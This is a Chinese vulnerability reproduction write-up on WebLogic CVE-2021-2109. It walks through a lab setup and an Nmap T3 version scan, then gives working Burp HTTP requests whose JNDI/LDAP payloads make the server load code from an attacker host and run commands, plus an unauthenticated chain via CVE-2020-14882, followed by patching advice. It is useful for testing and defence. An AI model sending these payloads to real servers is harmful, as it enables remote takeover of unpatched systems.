0x00 简介
WebLogic是美国甲骨文公司出品的一个application server(应用服务器),确切的说是一个基于JAVAEE架构的中间件,WebLogic主要用于开发、继承、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。
0x01 漏洞概述
CVE-2021-2109是存在于WebLogic Server的console中的一个远程代码执行漏洞,经过身份验证的攻击者可以直接通过JNDI远程执行命令或者注入代码,可以配合CVE-2020-14882未授权漏洞执行任意代码。
0x02 影响版本
WebLogic10.3.6.0.0
WebLogic12.1.3.0.0
WebLogic12.2.1.3.0
WebLogic12.2.1.4.0
WebLogic14.1.1.0.0
0x03 环境搭建
Java环境配置:
一定要安装jdk1.7
jdk1.7下载链接:http://download.oracle.com/otn-pub/java/jdk/7/jdk-7-windows-x64.exe
具体安装步骤可以自行上网搜索,这里推荐 https://www.runoob.com/java/java-environment-setup.html, 里面也有jdk下载的官网地址,安装jdk时安装路径最好全英文无空格,安装完后配置环境变量。
如果不安装jdk1.7,后续配置步骤则会遇到如下错误,
安装完Weblogic后打开WebLogic Scripting Tool时可以看到如下报错!
这是由于我们下载安装的weblogic10.3.6版本最高只支持 jdk1.7,而我们给weblogic配置的是1.8版本,
如果已装有jdk1.7,则直接执行以下步骤,没装jdk1.7但已使用jdk1.8安装了weblogic,则在安装完jdk1.7后执行以下步骤
将weblogic安装目录下C:\Oracle\Middleware\wlserver_10.3\common\bin\commEnv.cmd 文件中的。
@rem Reset JAVA Home
set JAVA_HOME=C:\Java\jdk1.8.0_212
FOR %%i IN ("%JAVA_HOME%") DO SET JAVA_HOME=%%~fsi
修改为
@rem Reset JAVA Home
set JAVA_HOME=C:\Java\jdk1.7.0
FOR %%i IN ("%JAVA_HOME%") DO SET JAVA_HOME=%%~fsi
保存后双击运行即完成配置修改。
安装配置Weblogic Server(Windows):
Weblogic Server下载链接:
https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html
页面最底下点击下载10.3.6版本(997M),下载完成后将安装程序放到靶机并运行
具体安装和配置步骤参考以下链接,
只需要完成WebLogic安装步骤即可,配置步骤在本次复现中无需进行。
启动WebLogic并输入用户名密码
访问 http://127.0.0.1:7001/console/登录
0x04 漏洞复现
1.本地漏洞检测
1.执行指令查看版本信息
cd/Oracle/Middleware/wlserver_10.3/server/lib
java-cpweblogic.jarweblogic.version
没有显示打补丁的信息则存在漏洞
2.使用Nmap进行远程漏洞扫描
可以通过访问控制台登录页 (/console/login/LoginForm.jsp) 看底部版本号,但是该页面很可能被删除或无法访问,此时可以通过Nmap自带的针对WebLogic的扫描脚本来进行版本探测,Nmap会发送T3协议的数据包,并从返回包中的HELO信息获取weblogic的版本.
nmap -n-v-Pn-sV192.168.50.0/24 -p7001,7002 --script=weblogic-t3-info.nse
扫描结果显示192.168.50.139目标靶机开启了7001端口的T3协议
同时WebLogic Server的版本为10.3.6,在CVE-2021-2109影响范围内
3.feihong-cs 版EXP
https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11
下载编译好的jar包后执行指令来启动LDAP和HTTP服务(-i 选项后接本机IP)
java-jarJNDIExploit-v1.11.jar-i192.168.50.139
启动后无内容,此时已经打开HTTP和LDAP服务,如果接收到LDAP的请求就会打印出内容并处理,
打开Burpsuite的Repeater模块,填入并修改payload,
POST /console/consolejndi.portal HTTP/1.1
Host: 192.168.50.139:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Cookie: ADMINCONSOLESESSION=1w6DgCLLkQhPRBqkQthhQvPqpT4SvTl22rSjK3kRHxw0WHLhnzG1!-766673213
Connection: close
Content-Length: 176
cmd:whoami
_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.50;139:1389/Basic/WeblogicEcho;AdminServer%22)
点击 Send 发送payload
服务端接收到payload,执行并返回结果
4.配合使用未授权漏洞
POST /console/css/%252e%252e/consolejndi.portal HTTP/1.1
Host: 192.168.50.139:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 177
Connection: close
?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.50;139:1389/Basic/WeblogicEcho;AdminServer%22)
0x05 修复建议
1.升级Weblogic Server运行环境的JDK版本;
2.禁用T3协议, 进入Weblogic控制台,在base_domain配置页点击“安全”选项卡 -> “筛选器”,配置筛选器,在连接筛选器中输入:weblogic.security.net.ConnectionFilterImpl,在连接筛选器规则框中输入:* * 7001 deny t3 t3s;
3.使用Weblogic Server官方提供的安全补丁进行修复,https://www.oracle.com/security-alerts/cpujan2021.html;
4.临时关闭后台/console/console.portal对外访问;
5.禁止启用IIOP,登陆Weblogic控制台,找到启用IIOP选项,取消勾选并重启.
来源:freebuf.com 2021-06-24 16:53:18 by: 17608406504
请登录后发表评论
注册